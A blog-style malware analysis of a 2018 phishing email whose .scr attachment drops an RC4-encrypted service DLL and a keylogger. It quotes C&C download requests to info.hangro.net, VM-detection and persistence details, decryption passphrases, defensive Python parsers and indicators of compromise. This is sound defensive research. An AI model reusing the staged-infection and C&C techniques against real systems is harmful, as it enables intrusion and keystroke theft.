Sunday, 18 March 2018

Happy New Year wishes from China

At the end of January 2018 one of the government agencies in Poland received an email with New Year's wishes, apparently sent by a Chinese government agency. The content of the email was definitely suspicious, so we decided to perform a deeper analysis of this attack attempt.


First of all we have to understand the email header. The Received entries are the most important part of the header, because they list all the hosts through which the message travelled. We can notice that the real source IP address of the sender is 39.109.6.203, so probably a misconfiguration of one of the Chinese servers allowed the sender's email address to be spoofed.

Received: from WIN-RME55NNMJCN (unknown [39.109.6.203])
    by mail1.***.gov.cn (c) with ESMTPA id 68AA921190
    for <***.gov.pl>; Wed, 31 Jan 2018 09:54:39 +0800 (HKT)
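Walking the Received chain by hand works for one message; the following Python is an added example (not the author's tooling) that unfolds the headers, parses each Received line and returns the first hop, which is what identifies 39.109.6.203 above. The header block is constructed: the second Received line is the one quoted, while the first hop (the recipient's own MX, with a documentation-range address) is invented for the example.

```python
import re

# Constructed header block (example data, not the original message): the
# second Received line is the one quoted above; the first hop, added by the
# recipient's MX, is invented here with a documentation-range address.
RAW_HEADERS = """\
Received: from mail1.***.gov.cn (mail1.***.gov.cn [203.0.113.10])
    by mx.***.gov.pl (Postfix) with ESMTPS id 4F2B1C0
    for <***.gov.pl>; Wed, 31 Jan 2018 02:55:01 +0100 (CET)
Received: from WIN-RME55NNMJCN (unknown [39.109.6.203])
    by mail1.***.gov.cn (c) with ESMTPA id 68AA921190
    for <***.gov.pl>; Wed, 31 Jan 2018 09:54:39 +0800 (HKT)
"""

# from <helo> (<rdns> [<ip>]) by <host> ... with <protocol>
RECEIVED_RE = re.compile(
    r"from\s+(?P<helo>\S+)\s+\((?:(?P<rdns>[^\s\[\]]+)\s+)?\[(?P<ip>[0-9A-Fa-f.:]+)\]\)"
    r".*?\bby\s+(?P<by>\S+)(?:.*?\bwith\s+(?P<proto>\S+))?",
    re.S,
)

def unfold_headers(raw):
    """Join RFC 5322 folded continuation lines; return (name, value) pairs in order."""
    fields = []
    for line in raw.splitlines():
        if line[:1] in (" ", "\t") and fields:          # folded continuation
            name, value = fields[-1]
            fields[-1] = (name, value + " " + line.strip())
        elif ":" in line:
            name, value = line.split(":", 1)
            fields.append((name.strip().lower(), value.strip()))
    return fields

def parse_received(value):
    """Pull sending host, its IP/rDNS, receiving MTA and protocol out of one Received value."""
    m = RECEIVED_RE.search(value)
    return m.groupdict() if m else None

def received_chain(raw):
    """Received headers top-down: each MTA prepends its own, so the last one is the first hop."""
    return [h for h in (parse_received(v) for n, v in unfold_headers(raw) if n == "received") if h]

def originating_hop(raw):
    """The host that injected the message, with a flag for missing reverse DNS."""
    hop = received_chain(raw)[-1]
    # 'unknown' means the receiving MTA could not reverse-resolve the client: a red flag.
    hop["no_rdns"] = hop["rdns"] in (None, "unknown")
    return hop
```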


The next step was to analyse the attached rar archive. It contained only one file, named Happy 2018.scr. After execution we can see a nice picture with wishes (presented at the beginning of this article).
The JPG file is stored in the resource section (.rsrc) of the scr file. Malware often stores an embedded program or configuration data in this section. API function names were obfuscated, but finally we noticed that the following API calls were used to handle resource objects: FreeResource(), LockResource(), LoadResource(), FindResourceA(), SizeOfResource().


At the same time the malware reads the SYSTEM\CurrentControlSet\Services\disk\Enum registry key. This is a known trick to detect virtual machines, because the enumerated disk identifiers reveal the hypervisor vendor.


Other API functions are resolved at runtime with LoadLibraryA() and GetProcAddress(): OpenServiceA(), StartServiceA(), OpenSCManagerA(), QueryServiceStatus(), ControlService(), CloseServiceHandle(), CreateServiceA(), RegOpenKeyExA(), RegCloseKey(), RegSetValueExA(), RegQueryValueA(), RegCreateKeyA(), RegEnumValueA().
If the malware does not detect a virtual machine, a new service is installed. The service name is Avriax and its description is "Multiple defender service with one windows service". The following execution command is written to the Windows registry: %SystemRoot%\system32\svchost -k Avriax. A dll file is the second-stage malware. It is extracted from the BIN resource of the scr file and is encrypted with the RC4 algorithm using the passphrase “ULoveVas”. After installation the service is started immediately.

00402A97  |. FF15 70504000  CALL DWORD PTR DS:[405070]               ;  ADVAPI32.OpenSCManagerA
00402A9D  |. 8BF8           MOV EDI,EAX
00402A9F  |. 85FF           TEST EDI,EDI
00402AA1  |. 74 32          JE SHORT Happy_20.00402AD5
00402AA3  |. 8B4424 08      MOV EAX,DWORD PTR SS:[ESP+8]
00402AA7  |. 56             PUSH ESI
00402AA8  |. 68 10000100    PUSH 10010
00402AAD  |. 50             PUSH EAX
00402AAE  |. 57             PUSH EDI
00402AAF  |. FF15 74504000  CALL DWORD PTR DS:[405074]               ;  ADVAPI32.OpenServiceA
00402AB5  |. 8BF0           MOV ESI,EAX
00402AB7  |. 85F6           TEST ESI,ESI
00402AB9  |. 74 12          JE SHORT Happy_20.00402ACD
00402ABB  |. 6A 00          PUSH 0
00402ABD  |. 6A 00          PUSH 0
00402ABF  |. 56             PUSH ESI
00402AC0  |. FF15 80504000  CALL DWORD PTR DS:[405080]               ;  ADVAPI32.StartServiceA


The malware connects to the C&C server and downloads another file, 30_1.exe. info.hangro.net resolves to the same IP address, 39.109.6.203.

GET /session/manager?mode=0&id=JWXswTgi0184796 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: info.hangro.net
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Disposition: attachment; filename="robots.txt"
Content-Type: application/x-msdownload
Content-Length: 10
Date: Wed, 31 Jan 2018 18:29:18 GMT

30_1.exe
GET /session/manager?mode=30_1.exe&id=JWXswTgi0184796 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: info.hangro.net
Cache-Control: no-cache
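The exchange above carries several signals a proxy or IDS analyst can key on: an IE6/XP User-Agent in 2018 traffic, an executable MIME type served under the name robots.txt, and a 10-byte "executable" that is really the name of the next stage. The following Python is an added example (not the author's tooling) that parses a constructed copy of this transcript and returns those reasons; the body is assumed to be "30_1.exe" plus CRLF, which is what makes up the advertised 10 bytes.

```python
import re

# Constructed transcript of the exchange quoted above (not captured traffic);
# assumed: the 10-byte body is "30_1.exe" followed by CRLF.
REQUEST = (
    "GET /session/manager?mode=0&id=JWXswTgi0184796 HTTP/1.1\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n"
    "Host: info.hangro.net\r\n"
    "Cache-Control: no-cache\r\n\r\n"
)
RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache-Coyote/1.1\r\n"
    'Content-Disposition: attachment; filename="robots.txt"\r\n'
    "Content-Type: application/x-msdownload\r\n"
    "Content-Length: 10\r\n"
    "Date: Wed, 31 Jan 2018 18:29:18 GMT\r\n\r\n"
    "30_1.exe\r\n"
)

def parse_http(raw):
    """Split one HTTP message into (start line, lower-cased header dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    start, *lines = head.split("\r\n")
    headers = {}
    for line in lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return start, headers, body

def disposition_filename(headers):
    """Filename advertised in Content-Disposition, or None."""
    m = re.search(r'filename="?([^";]+)"?', headers.get("content-disposition", ""))
    return m.group(1) if m else None

def suspicious_download(request, response):
    """Reasons this request/response pair looks like a staged C2 download."""
    _, req_h, _ = parse_http(request)
    _, resp_h, _ = parse_http(response)
    reasons = []
    ua = req_h.get("user-agent", "")
    if "MSIE 6.0" in ua or "Windows NT 5.1" in ua:
        reasons.append("legacy IE6/XP User-Agent")
    fname = (disposition_filename(resp_h) or "").lower()
    if resp_h.get("content-type") == "application/x-msdownload":
        if not fname.endswith((".exe", ".dll")):
            reasons.append(f"executable MIME type disguised as '{fname}'")
        if int(resp_h.get("content-length", "0")) < 64:
            reasons.append("executable-typed body too small for a PE (next-stage name?)")
    return reasons
```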


The downloaded file is also encrypted with the RC4 algorithm; the passphrase is “Higaisakora.0”. After decryption the executable is run with the CreateProcessA() API from the C:\Windows\TEMP directory. All strings in this file are encoded. The decoding instructions are presented below:
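Both stages are RC4-encrypted with a passphrase recovered during analysis (“ULoveVas” for the dll in the scr's BIN resource, “Higaisakora.0” for 30_1.exe). The following Python is an added example, not the author's tooling and not the string-decoding routine referred to above: it implements RC4 and tries each passphrase against an extracted blob, accepting the result only when it parses as a PE file. The encrypted sample blob is a constructed MZ/PE header skeleton, not the real payload.

```python
# Added example: pure-Python RC4 plus a PE sanity check, used to try the two
# passphrases named in this write-up against an extracted blob.

def rc4(key, data):
    """RC4 stream cipher (KSA + PRGA); the same call encrypts and decrypts."""
    S = list(range(256))
    j = 0
    for i in range(256):                        # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:                           # pseudo-random generation
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def looks_like_pe(blob):
    """True if blob has an MZ header whose e_lfanew points at the 'PE\\0\\0' signature."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(blob[0x3C:0x40], "little")
    return blob[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"

def decrypt_stage(blob, candidates=("ULoveVas", "Higaisakora.0")):
    """Try each passphrase from the analysis; return (passphrase, plaintext) once it parses as PE."""
    for pw in candidates:
        plain = rc4(pw.encode(), blob)
        if looks_like_pe(plain):
            return pw, plain
    return None, None

# Constructed stand-in for the BIN resource: a minimal MZ/PE header skeleton
# (not real malware) encrypted with the scr's passphrase.
_fake = bytearray(0x80)
_fake[0:2] = b"MZ"
_fake[0x3C:0x40] = (0x40).to_bytes(4, "little")
_fake[0x40:0x44] = b"PE\x00\x00"
SAMPLE_RESOURCE = rc4(b"ULoveVas", bytes(_fake))
```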


In the example below we can see another decoded Windows service name. The second service will be installed by the new malware file.


The functionality of the exe file is easily identified by looking at the decoded API names.


The executable also contains a new resource: one more dll file. This time the malicious dll library is not encrypted. We can use CFF Explorer to extract the new library.


The dll file is stored in C:\Users\<username>\AppData\Roaming\System\hpptx386.dll and a new service named HP Printer Software is created. This is the last stage of the infection.
The DLL file is a keylogger. All data are stored in the Info.dat file and sent to the C&C host vachel.vicp.cc [IP: 39.109.6.203]. There are several methods of implementing keyloggers in Windows. The method used in the described example is based on GetAsyncKeyState() and GetKeyState(). These functions are used to query the status of all keys.


Basic IoCs are listed below:
  • (Happy 2018.scr) SHA1: 511F7BC170C596AD1A26D616359A78851EB7881B
  • (Avriax32.dll) SHA1: 2FB33BF79BCACA2445F66769C5261037C2EF92E2
  • (30_1.exe - encrypted) SHA1: 82BAC0B378285F914C518F39F54DA3E4A7A54588
  • (decrypted) SHA1: F372CE319060F103714D0F8897F846452786BB31
  • (hpptx386.dll) SHA1: 83B995717F82F97D3A65C7E6FBFB59908EEDE811
  • 39.109.6.203
  • info.hangro.net
  • vachel.vicp.cc